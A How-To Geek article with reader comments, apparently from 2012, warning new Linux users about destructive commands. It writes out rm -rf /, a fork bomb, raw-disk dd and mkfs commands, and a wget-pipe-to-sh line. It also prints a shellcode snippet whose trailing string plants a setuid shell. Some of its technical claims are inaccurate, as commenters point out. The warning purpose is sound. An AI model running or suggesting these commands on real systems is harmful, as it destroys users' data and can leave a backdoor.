SEARCH

How-To Geek

8 Deadly Commands You Should Never Run on Linux

image

Linux’s terminal commands are powerful, and Linux won’t ask you for confirmation if you run a command that won’t break your system. It’s not uncommon to see trolls online recommending new Linux users run these commands as a joke.

Learning the commands you shouldn’t run can help protect you from trolls while increasing your understanding of how Linux works. This isn’t an exhaustive guide, and the commands here can be remixed in a variety of ways.

Note that many of these commands will only be dangerous if they’re prefixed with sudo on Ubuntu – they won’t work otherwise. On other Linux distributions, most commands must be run as root.

Image Credit: Skull and Crossbones remixed from Jason Ford on Twitter

rm -rf / – Deletes Everything!

The command rm -rf / deletes everything it possible can, including files on your hard drive and files on connected removable media devics. This command is more understandable if it’s broken down:

rm – Remove the following files.

-rf – Run rm recursively (delete all files and folders inside the specified folder) and force-remove all files without prompting you.

/ – Tells rm to start at the root directory, which contains all the files on your computer and all mounted media devices, including remote file shares and removable drives.

Linux will happily obey this command and delete everything without prompting you, so be careful when using it! The rm command can also be used in other dangerous ways – rm –rf ~ would delete all files in your home folder, while rm -rf .* would delete all your configuration files.

The Lesson: Beware rm -rf.

Disguised rm –rf /

Here’s another snippet of code that’s all over the web:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

This is the hex version of rm –rf / executing this command would wipe out your files just as if you had run rm –rf /.

The Lesson: Don’t run weird-looking, obviously disguised commands that you don’t understand.

:(){ :|: & };: – Fork Bomb

The following line is a simple-looking, but dangerous, bash function:

:(){ :|: & };:

This short line defines a shell function that creates new copies of itself. The process continually replicates itself, and its copies continually replicate themselves, quickly taking up all your CPU time and memory. This can cause your computer to freeze. It’s basically a denial-of-service attack.

The Lesson: Bash functions are powerful, even very short ones.

image

Image Credit: Dake on Wikimedia Commons

mkfs.ext4 /dev/sda1 – Formats a Hard Drive

The mkfs.ext4 /dev/sda1 command is simple to understand:

mkfs.ext4 – Create a new ext4 file system on the following device.

/dev/sda1 – Specifies the first partition on the first hard drive, which is probably in use.

Taken together, this command can be equivalent to running format c: on Windows – it will wipe the files on your first partition and replace them with a new file system.

This command can come in other forms as well – mkfs.ext3 /dev/sdb2 would format the second partition on the second hard drive with the ext3 file system.

The Lesson: Beware running commands directly on hard disk devices that begin with /dev/sd.

command > /dev/sda – Writes Directly to a Hard Drive

The command > /dev/sda line works similarly – it runs a command and sends the output of that command directly to your first hard drive, writing the data directly to the hard disk drive and damaging your file system.

command – Run a command (can be any command.)

> – Send the output of the command to the following location.

/dev/sda – Write the output of the command directly to the hard disk device.

The Lesson: As above, beware running commands that involve hard disk devices beginning with /dev/sd.

dd if=/dev/random of=/dev/sda – Writes Junk Onto a Hard Drive

The dd if=/dev/random of=/dev/sda line will also obliterate the data on one of your hard drives.

dd – Perform low-level copying from one location to another.

if=/dev/random – Use /dev/random (random data) as the input – you may also see locations such as /dev/zero (zeros).

of=/dev/sda – Output to the first hard disk, replacing its file system with random garbage data.

The Lesson: dd copies data from one location to another, which can be dangerous if you’re copying directly to a device.

hard-drive-lights

Image Credit: Matt Rudge on Flickr

mv ~ /dev/null – Moves Your Home Directory to a Black Hole

/dev/null is another special location – moving something to /dev/null is the same thing as destroying it. Think of /dev/null as a black hole. Essentially, mv ~ /dev/null sends all your personal files into a black hole.

mv – Move the following file or directory to another location.

~ – Represents your entire home folder.

/dev/null – Move your home folder to /dev/null, destroying all your files and deleting the original copies.

The Lesson: The ~ character represents your home folder and moving things to /dev/null destroys them.

wget http://example.com/something -O – | sh – Downloads and Runs a Script

The above line downloads a script from the web and sends it to sh,which executes the contents of the script. This can be dangerous if you’re not sure what the script is or if you don’t trust its source – don’t run untrusted scripts.

wget – Downloads a file. (You may also see curl in place of wget.)

http://example.com/something – Download the file from this location.

| – Pipe (send) the output of the wget command (the file you downloaded) directly to another command.

sh – Send the file to the sh command, which executes it if it’s a bash script.

The Lesson: Don’t download and run untrusted scripts from the web, even with a command.


Know any other dangerous commands that new (and experienced) Linux users shouldn’t run? Leave a comment and share them!

Chris Hoffman is a technology writer and all-around computer geek. He's as at home using the Linux terminal as he is digging into the Windows registry. Connect with him on Google+.

  • Published 09/24/12

Comments (69)

  1. NSDCars5

    rm *
    This too. Removes every file in the directory. Frequently used with su, followed by password, followed by cd \, followed by this.

  2. Ailurus

    Another one :

    chmod 777 -R /

  3. popux

    Huhu :

    dd if=/dev/urandom of=/dev/mem bs=1 count=1 seek=$RANDOM

  4. Oosterhagen

    Also a killer:
    boot from a cd and run: D:/i386/winnt …

  5. Gal

    oh, such cute pranksters, so superior and clever! and people wonder why Linus isn’t taking over the world, being free and all.

  6. TechGeek01

    You guys ever tried Suicide Linux?

  7. Paul

    At least Windows won’t let you format your C: drive while Windows is running. Why does Linux do it while Linux is running? Isn’t Linux meant to be more secure?

  8. Jonathan

    but dd if=/dev/zero of=/dev/sda is perfect if you have all of your data off the drive and you want to securely wipe the drive and write zeros over the data so it can’t be gotten back. You can dd the hard drive with zero’s then format the drive with a NTFS or Fat partition and be ready to use the drive again, and the drive would be securely wiped.

  9. r

    No, Linux isn’t meant to be more secure. It’s meant to be widely available for use & development.

  10. Green Star

    :(){ :|: & };:

    Above one is much dangerous, this can be combined with any command like sed or awk to look normal. Excellent article.

  11. Jonathan

    Not saying linux is more secure, just saying that you can use linux to securely wipe your hard drives with dd…

  12. Noel

    Does an antivirus on Linux prevent these commands with sudo ?

  13. Christine

    “\rm -rf *

    is a command that has gotten me into trouble on more than one occasion. Especially if I intended to type something after the asterisk but my thumb hit the space key by accident and/or if I am not in the directory or terminal session I thought I was in.

    The preceding “\” tells the OS to ignore any alias you might have setup to safeguard against disaster. ( alias rm ‘rm -i’ )

    -cj

  14. kenny

    is anyone else setting up a virtualbox to see the effect of these? I remember setting up a virtualised windows to run format: c and being gutted it did not work. I am not suggesting the above commands don’t work btw

  15. Sid

    Noel, exactly what doe any antivirus program have to do with sudo (or any other legitimate Linux/Unix command)? Linux/Unix assumes the root user knows what he/she is doing. If that’s not the case, then you have no business operating as root, and deserve the consequences of your actions.

  16. bobcratchett

    Most of these require root privilege to be effective and if you don’t know what you are doing you should not have/be using that privilege anyway

  17. mynameisjohn

    This is a great article. I suppose that most people that use the command line have a little Geek in their DNA but I guess we can’t assume that to be totally true. Even Geeks like to experiment though… what happens if??? I have only myself to blame for some of the things I actually knew better than to do. Rule number 1: BACK-UP. Rule # 2 through 10: BACK-UP!!!!!!

  18. required

    mv: cannot overwrite non-directory `/dev/null’ with directory `/home/joe’

  19. Darm

    mv ~ /dev/null – seriously? You won’t delete anything with that.
    rm -rf / doesn’t work either (at least on modern distros) you have to use rm -rf /*

    @Paul: It is more secure. But it also tries to not limit the superuser. And superuser should be competent person. It’s also the reason why Ubuntu shows user just GUI utilities using sudo and hide root acount as much as it can.

    Also, good old joke with removing /windows/system32 for better performance still works, doesn’t? :)

  20. cam2644

    Linux is a great system that’s easy to operate for basic purposes.It’s more user flexible than Windows but as a general rule it’s a good idea to have confidence in any supplier of hints or info before following their instructions. That might appear obvious but it’s easy to get carried away when exploring a new path.

  21. Joseph

    Thank you.

  22. Tim

    The bottom line here is that new users and old users alike should issue commands unless they do a little research to figure out what they might be doing first.

    As for Linux “not doing this” or supposed to be “more secure” Unix from which it came, was developed to be a lean, fast, power users OS. The general idea was to give the user the most power possible and to assume they know what they are doing when they issue a command. People who are not willing to learn how to use the tools properly should avoid the command line entirely and perhaps even use an OS that does a little more hand holding.

  23. Michael Doncaster

    Shouldn’t that be “run a command that WILL break your system?

    Quote;
    “Linux’s terminal commands are powerful, and Linux won’t ask you for confirmation if you run a command that won’t break your system. It’s not uncommon to see trolls online recommending new Linux users run these commands as a joke.”
    Unquote

  24. Tim

    Arg. That should read “… and old users alike should NOT issue commands …”

  25. David V.

    @Paul: Makes sense, but any OS insecure in the hand of a stupid Sysadmin.

  26. Richard Steven Hack

    As Darm mentioned above, a number of people have tried the old rm standby – deliberately and otherwise – and discovered that, while it did damage the system, it didn’t erase “everything” due to permission issues and other reasons. Of course, that distinction may be irrelevant depending on what damage IS done.

    As noted, most of these are only dangerous if they are embedded in scripts you’ve downloaded from the Web and haven’t examined. They are unlikely to be entered by accident, even by a naive user. Even the rm one requires you to enter the “/” to start it at root to do real damage – done from a lower level non-system directory won’t damage the system.

    Most of these tricks exist solely for malicious use and should be avoided for that reason.

    Christine: The solution to the thumb on the enter key mistake is to change to the directory you WANT it to run from and run it from there. That way you can’t erase something by accident. In general, when using the command line, it’s best to minimize the typing of target directories to avoid accidents by either switching to the affected directory (or its parent) first, or by copying and pasting the entire path to the command from a directory display (terminal or GUI). It saves typing and helps in avoiding trouble.

    These days in Linux I rarely ever use the command line except occasionally to concatenate a split file, convert an HTML file into a PDF, or run top to see why the system is loaded down. The GUI interface handles everything else nicely.

    A normal user almost never needs to use the command line and never with some long multiple command string – unless following some instructions form a forum while being helped with a problem. So running into any of the listed commands is highly unlikely.

  27. Bjarnovikus

    @paul
    Linux is more secure by not limiting what a user can do with it. By having full control over your computer you can change things how you like them… Indeed, these commands are dangerous, but commands like these can work too on Windows, maybe with a 3rd party application. It’s just a “simple” if loop that protects windows from damaging itself. A 3rd party app could not check this. See it like a virus app maybe?

  28. badger_fruit

    To response to Paul’s comment:-

    “At least Windows won’t let you format your C: drive while Windows is running. Why does Linux do it while Linux is running? Isn’t Linux meant to be more secure?”

    Yes, Linux is more secure, however this isn’t an issue of security; Linux trusts that what the user told it to do, is what the user wants to do (without all the ‘are you sure’ prompts). If you say to a linux machine “Delete all files from the root directory recursively”, then it does.

    Fortunately, thanks TO security, unless you run that command as root, you’ll be unlikey to wipe out important system files as they’re read only by non-root users. With Windows, I have seen prompts that say “You’re not allowed to view the contents of this folder, but if you click here then you can”. I mean seriously, WTF?

  29. 0xRiddle

    Nothing is idiot proof , you ought to know that already ..

  30. SoL

    @ badger_fruit: re: “…Linux is more secure, however this isn’t an issue of security; Linux trusts that what the user told it to do, is what the user wants to do…”

    This makes little sense, because you assume that users either always know what to do, or they should just keep away. This defeats the whole point of any new generation of users trying to get familiar with the OS, even as root. There is a learning curve to everything, and Linux certainly doesn’t trust user commands, or make itself any more secure because you have the freedom to initiate commands without security prompts. This article is all about the issue of Linux security.

  31. John Vinton

    Ive seen many people have trouble with rm .* (or any file changing command with .*)

    Typically, I’ve seen it used when someone wants to delete all the
    “hidden” files beginning with “.” in their home directory. (i.e. .profile, .history, etc.)

    I always replace the “rm” command with “ls” first to test whether it will affect
    the files I think it will.

  32. Alex e

    Linux/UNIX “assumes” you know what you’re doing. Although Linux has become more mainstream, it still retains it’s original character. UNIX based systems such as Linux are “very” powerful and don’t have time to cuddle you and constantly make sure “you’re cool with what you want to do” As most know, UNIX doesn’t give a hoot, you ask it to blow up the world, and it will without a nanosecond’s thought about it and it won’t consult you either.

  33. NV1T

    Linux (and UNIX in general) remind me of a chainsaw. Anybody can buy a chainsaw. Competent
    people use them safely. Idiots cut their own legs off.

  34. Robynsveil

    @Paul: it is more secure. You see, Linux users don’t log in as root, routinely. They log in with restricted privileges. Those commands only work when logged in as root, with all privileges given. Sere paragraph 3 of above article:

    “Note that many of these commands will only be dangerous if they’re prefixed with sudo on Ubuntu – they won’t work otherwise. On other Linux distributions, most commands must be run as root.”

    In Windows, one assumes the user has root privileges. UAC is meant to answer for this lack of security (you can log in as ‘root’ but with UAC enabled, you are asked whether you wish to do things).
    The difference is: whilst you are asked whether you want to do a certain task or have to be logged in as admin to do it, viruses and malware happily do whatever they want, since they are ‘executables’ and the writers have been able to circumvent that useless UAC thing.
    In Linux, nothing runs unless you’ve given it permission. Or unless you deliberately log in as SuperUser and issue dangerous commands. With power comes responsibility.

    “Gegen Dummheit kämpfen Götter selbst vergebens…”

  35. Rahul Panchal

    @NV1T

    Your metaphor about UNIX is exactly right. Now to try this in a VM…

  36. oldgeek

    Linux is not a good choice for the average user. People who treat the computer like it’s a toaster. People who would be perplexed by a toaster with TWO LEVERS!

    You know, the typical Mac user!

  37. xilef

    @NV1T & oldgeek +1

    @Robynsveil this quote is so true! (& thanks to Google…)

  38. nix

    Not exactly
    In this example
    $cp -R /usr . #to create a directory tree
    $mv usr/ /dev/null
    mv: cannot overwrite non-directory `/dev/null’ with directory `usr/’
    #mv command, in this case, in unable to destroy a non-empty directory

  39. Drew P. Balls

    Baleet System32!

    Seriously, I enjoyed reading this.

  40. Blis

    Ha,..all I get from this is that most of you sound like a bunch of kids trying to be cool.
    But your just not, aren’t you?

  41. John Kim

    To richard:

    The command line is still very useful for Linux developers however. Mastery of the command line is essential to understanding the power of Linux.

  42. pbug56

    Linux has its uses (at it’s heart it is small and efficient) but it is inherently unfriendly and designed for geeks. It’s big savings brace is that you can create a GUI / shell over it that hides the innards from its users. Last time I checked, that’s what Apple did with its computers, and I believe that’s what you find on Android phones. I believe TIVO’s do this as well.

  43. Fe

    well I ran mkfs.ext4 /dev/sda1 and saw dust when i couldn’t boot up my PC the next time and I was getting an when i also tried to reinstall that my hard disk didn’t exist. Nowadays I read more on new command before i run it.

  44. Abu Zibby

    I fail to see the point of this article. There are literally millions of ways to damage a running system as superuser, be it UNIX, Linux or Windows. This is why on mission critical systems you usually pay sysadmins to do a proper job instead of letting a poor n00b poke around.

    [-1] for dumbness

  45. miro

    to Paul: rmdir /s /q C:\*
    works nice on windows, of course admin right needed.

  46. michal

    most of those commands will not work on recent distribution or poorly setup systems:
    rm -rf / – that doesn’t work for ages. You mus use –no-preserve-root argument to force rm doing it.
    forkbomb – well, if you didn’t set ulimit properly, it’s your problem, isn’t it?
    mkfs will not overwrite mounted filesystem so your / is safe. And if the filesystem is not mounted, it will display a warning about other filesystem present and asks the user for approval.
    mv ~ /dev/null – well, that is utter nonsense, you can not overwrite a file with a directory, can you? If you move regular file over /dev/null, you loose the character file and might loose the content of the file as some programs might overwrite it.

    Only dd and wget example does what you told it to do.

  47. michal

    forgot to mention, the bash forkbomb will consume other resources from memory sooner. The pids is good example.

  48. John Blair

    *To the guy asking if GNU/Linux is supposed to be more secure the answer is yes. However it’s like this: you give a cup of poison to a dumb ass and tell them not to drink it, but they do anyway. It didn’t have a lid on it, so all they had to do was put it up to their mouth and drink it. GNU/Linux is like giving that person a cup of poison with a twisty lid on it. If they’re dumb enough to untwist the lid and drink it, then they’re on their own.

    tl;dr An OS won’t save someone from their own stupidity. You can only prevent a person from doing stupid things with their computer for so long.

  49. dodger2654

    I agree with Tim, I think most people turn to Linux either from having to work with it, or people that are looking for an OS that gives them more control over their system. If you don’t want to learn linux you should avoid, I honestly have to say that learning Linux was one of the more rewarding learning experiences I’ve had and worth every minute.

  50. elf

    That wuz lovely, Think I’m going to cry.

  51. Lee

    Thanks for the post. I have accidentally screwed up my OS before using the command line. These are good to know about. I think at one point I wanted to change ownership of all the files in a directory, and sub-directories. I meant to type

    chown user:user -fR ./*.8

    instead I typed

    chown user:user -fR /*.8

    Oops. Well, at least Linux is quick to install, and if set up properly, you can save most of your data, and settings.

    Personally, I don’t equate a “Secure” computer with “Idiot Proof”. Secure computers prevent others from breaking it, idiot proof prevents me from breaking it. I understand that others may want or need more idiot proofing. That is why other OS’s are popular. To each his own.

  52. Lee

    Hrm not sure where the “.8″ came from at the end of those commands above.

  53. Joseph

    Question! Does this work on ALL unix based systems like MacOSX? Just curious.

  54. UUUnicorn

    This is MORE than enough to cause a beginner to tear her/his hair out!

    Bloody farklempt, it is!

  55. Erik

    Here’s one for those of us who grew up during the early days of MS-DOS…
    RECOVER.EXE !
    Included with DOS, this simple little utility assumed you had file system issues; without warning, it removed all subdirectories and all entries in the root directory, creating new files with names such as “FILE0001.REC” in the root directory.

    I remember ruining my 5.25″ DOS boot diskette this way. Fortunately I was using a DISKCOPY’d backup.

    Another lovely one…
    FORMAT.COM /AUTOTEST

  56. RaviTeja

    But my question is why these commands are still allowed to execute ??

  57. David

    @raviteja ignorance on the part of the user isn’t a reason to get rid of something. Because some people can’t drive should you remove cars from the road?

    @Joseph most Macs have bash which would come with all these commands, so yes. Ran rm RF on one that I was erasing for fun. After a couple minutes it just locked up lol.

    @michael rm RF / still works, unless someone rewrote the command I don’t see why it wouldn’t. Also the move should work as long as you make it recursive. And you are moving files not overwriting.

  58. David

    Sorry michael, forgot dev/null is considered a file not a directory so you’re right the mv won’t work

  59. Paula Bean

    Sure Windows is safer than Linux, right? Because you would go about to just run random commands you find on the internet. Of course, after first elevating to root level, so they can do anything (because surely you know as a normal user you can’t access your hard disks directly and such). But in Windows, you would never download any random program (Mila.Kunis.Nude.Screensaver.exe anyone?) and just run them, then click the YES on the UAC dialogue (if you haven’t disabled UAC in the first place) just to see all your precious data disappear?

    Also in Windows it’s perfectly possible to erase an entire hard disk, even your system hard disk, while running. It’s just that it’s a little bit more elaborate. In Linux you can do it easily and out of the box, but on Windows you have to download third-party tools (and probably pay for them as well).

    Before starting to post blatantly ignorant comments, maybe familiarise yourself with the topic first, so you don’t look like you have absolutely no clue what you’re talking about.

  60. Matthias

    “Paul
    At least Windows won’t let you format your C: drive while Windows is running. Why does Linux do it while Linux is running? Isn’t Linux meant to be more secure?”

    Linux refuses to format a mounted partition (but may be forced)! Not letting the administrator format your drive is a restriction and not a security concept. But a world in which you need to do a remote audited format of your hard as a security concept to prevent small kiddies from deleting their porn and games sounds like a much secure place to me. Let’s talk to apple about that.

  61. PoL3

    @Paula Bean : In Windows you can’t erase a hard disk containing your system files (that particular partition) while it’s running. you would have to do this from cd, usb or some external source. You don’t need to pay for 3rd party tools to do it either.

    “Before starting to post blatantly ignorant comments, maybe familiarize yourself with the topic first, so you don’t look like you have absolutely no clue what you’re talking about.”

  62. Joannis Orlandos

    Just don’t use sudo unless you know what you’re doing. Linux can’t do most dangerous stuff without super-user permissions. Also therefore don’t randomly fill in your password when it asks you.

  63. Abbas

    Never use them but thanks for the knowledge. You’re cool Man!

  64. Aris S Ripandi

    never use it if you don’t know about this command!

  65. nub

    Linux is about have control not being controlled :) so it is a os that give you god status… if that scars you go back to windows and be a sheep

  66. nub

    and the good thing about linux is… YOU are the only 1 that can compromise your system allowing unknown scrips in so… u will never have a virus trogen etc unless you allow it to run unlike exe/dll stuff

  67. nub

    i know 3 posts but im drunk ….. there are many scrips out there… dont was te your time re-inventing the wheel… thereis sa much out there for free…. and 1 more thing make shore/sure you save ur work coz it will get re set linux as a ten-dance c to do that

  68. xilef

    could we have a breakdown of this one please?

    :(){ :|: & };:

  69. delilah

    I must say one thing: as a relatively novice user for the past few years not advanced beyond “hors d’oeuvre” level command use, I am a little shell-shocked right now at the amount of basics I took for granted in lin*x. For the ridiculous amount of hours i pored over internet searches for patches and fixes, one Notebook crash and three formats (oh, and two weeks) later, I am finally humbled?? I know to be careful in root; however thousands of people are flinging terminal commands at barefoot newbies all OVER the web and I had to stumble upon a page like this NOW? I see warnings about executing administrator-level commands maybe.. oh, I dunno, 1 for every 30-50 sudo command suggestions. “Widely Available.” Let’s make the respect for the freedom we share on these distros just that. No doubt most of you, like me, widely earned yours. I just need a little structure, you know?
    Thanks anyone for all the contributions you make.

Enter Your Email Here to Get Access for Free:

Go check your email!